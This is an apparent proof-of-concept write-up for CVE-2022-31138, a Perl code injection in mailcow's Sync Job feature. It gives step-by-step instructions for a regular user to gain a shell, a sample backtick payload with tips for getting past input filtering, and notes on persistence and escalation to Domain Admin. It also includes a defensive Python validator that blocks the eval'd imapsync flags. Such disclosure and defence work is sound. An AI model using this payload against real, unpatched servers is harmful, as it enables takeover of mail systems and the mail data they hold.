
CVE-2022-31138 PoC — OS Command Injection in mailcow

Associated Vulnerability

Title: OS Command Injection in mailcow (CVE-2022-31138)

Description: mailcow is a mailserver suite. Prior to mailcow-dockerized version 2022-06a, an extended privilege vulnerability can be exploited by manipulating the custom parameters regexmess, skipmess, regexflag, delete2foldersonly, delete2foldersbutnot, regextrans2, pipemess, or maxlinelengthcmd to execute arbitrary code. Users should update their mailcow instances with the `update.sh` script in the mailcow root directory to 2022-06a or newer to receive a patch for this issue. As a temporary workaround, the Syncjob ACL can be removed from all mailbox users, preventing changes to those settings.
# Mailcow CVE-2022-31138
RCE and Domain Admin privilege escalation for Mailcow. The POC for [CVE-2022-31245](https://github.com/ly1g3/Mailcow-CVE-2022-31245#proof-of-concept-poc) can be modified to work with this vulnerability.

Reported and fixed: 2022-06

## Code Injection, RCE
Type: Code Injection (CWE-94), RCE, Domain Takeover
Affected versions: at least 2019 - 2022-06a

A flaw exists in all recent Mailcow versions where a regular user of the system can exploit the “Sync Job” feature to gain a shell through Perl code injection in any of the regex fields that imapsync evaluates. Using this exploit, an attacker can then easily pivot to the database and escalate privileges to the role of “Domain Admin” in Mailcow.

This exploit includes persistence by default since Sync Jobs run on a timer.

This exploit compromises the entire Mailcow instance. Tested and working on the latest release as of 2022-06a.


### Technical overview
Almost all regex expressions in imapsync are evaluated with Perl's `eval` on a string, which is highly unsafe when the parameters come from user input. As an example, here is how `--regexmess` is handled in imapsync (line 14213):
```perl
sub regexmess
{
        my ( $string ) = @_ ;
        foreach my $regexmess ( @regexmess ) {
                $sync->{ debug } and myprint( "eval \$string =~ $regexmess\n" ) ;
                my $ret = eval "\$string =~ $regexmess ; 1" ;
```
In Mailcow, `$regexmess` comes from user input (the Sync Job custom parameters).

The following imapsync flags (could be more) can be used to achieve code execution:
```
--regexmess
--skipmess
--regexflag
--delete2foldersonly
--delete2foldersbutnot
--regextrans2
```

The vulnerability can be reproduced with the steps below.

Gaining shell:
1. Go to the Mailcow login page (not SOGo)
2. Login as a regular user
3. Go to Sync Jobs
4. Set the following values: `hostname=MAILCOW_IP, Port=IMAP_PORT, Username=CURRENT_USER, Password=CURRENT_PASS, Encryption=PLAIN, Interval=1, Active=Check, Custom Parameters=--debug --nosslcheck --regexmess=PERL_CODE`
   The "Custom Parameters" field is the important one; PERL_CODE can be arbitrary Perl code.
5. Press save and wait 1 min for the command to execute.

Custom Parameters example payload:
```
--debug --nosslcheck --regexmess=`touch\x{0020}test.txt`
```
PERL_CODE cannot contain spaces, quotes or slashes; use `\x{0020}` instead of a space. Use backticks (`` ` ``) to run shell commands.
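As an added defender-side example (not mailcow's or imapsync's code), here is a Python check that a sync-job form handler could run on the custom parameters before they are ever passed to imapsync: it rejects the eval'd flags named in the advisory, requires every other option to be on an allowlist, and refuses shell metacharacters in option values. `ALLOWED_FLAGS` and the remark about Getopt::Long abbreviations are assumptions, not taken from mailcow's actual fix.

```python
from __future__ import annotations
import re
import shlex

# Flags named in the advisory text and the README above.  imapsync hands the
# value of each to a Perl string eval, so the value is code, not a regex.
EVAL_FLAGS = frozenset({
    "regexmess", "skipmess", "regexflag", "delete2foldersonly",
    "delete2foldersbutnot", "regextrans2", "pipemess", "maxlinelengthcmd",
})
# Hypothetical allowlist of options a sync job may pass through (assumption:
# this is NOT mailcow's list).  --debug and --nosslcheck appear on this page;
# the others are ordinary imapsync options whose values are not eval'd.
ALLOWED_FLAGS = frozenset({"debug", "nosslcheck", "subscribeall", "automap"})

# Constructed copy of the README payload, used as test input.
README_PAYLOAD = r"--debug --nosslcheck --regexmess=`touch\x{0020}test.txt`"

_OPTION = re.compile(r"--?([A-Za-z]\w*)(?:=(.*))?", re.DOTALL)

def parse_option(token: str) -> tuple[str, str | None] | None:
    """Split '--Name=value' into ('name', 'value'); None for non-options."""
    m = _OPTION.fullmatch(token)
    return (m.group(1).lower(), m.group(2)) if m else None

def check_custom_params(params: str) -> list[str]:
    """Return every reason the custom parameter string must be rejected;
    an empty list means it only uses allowlisted options with clean values."""
    reasons = []
    try:
        # posix=False keeps backslashes and quotes verbatim, so each token is
        # examined exactly as imapsync would receive it.
        tokens = shlex.split(params, posix=False)
    except ValueError as exc:  # unbalanced quotes: refuse rather than guess
        return [f"unparsable custom parameters: {exc}"]
    for tok in tokens:
        opt = parse_option(tok)
        if opt is None:
            reasons.append(f"positional argument {tok!r} not allowed")
            continue
        name, value = opt
        if name in EVAL_FLAGS:
            reasons.append(f"--{name} is evaluated as Perl code by imapsync")
        elif name not in ALLOWED_FLAGS:
            # Exact-match allowlist also catches abbreviated names, which
            # Getopt::Long (imapsync's option parser) expands by default.
            reasons.append(f"--{name} is not an allowlisted imapsync option")
        if value is not None and re.search(r"[`$;|&<>]", value):
            reasons.append(f"shell metacharacter in value of --{name}")
    return reasons
```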


Privilege Escalation:

Follow the same steps as in [CVE-2022-31245](https://github.com/ly1g3/Mailcow-CVE-2022-31245#technical-overview).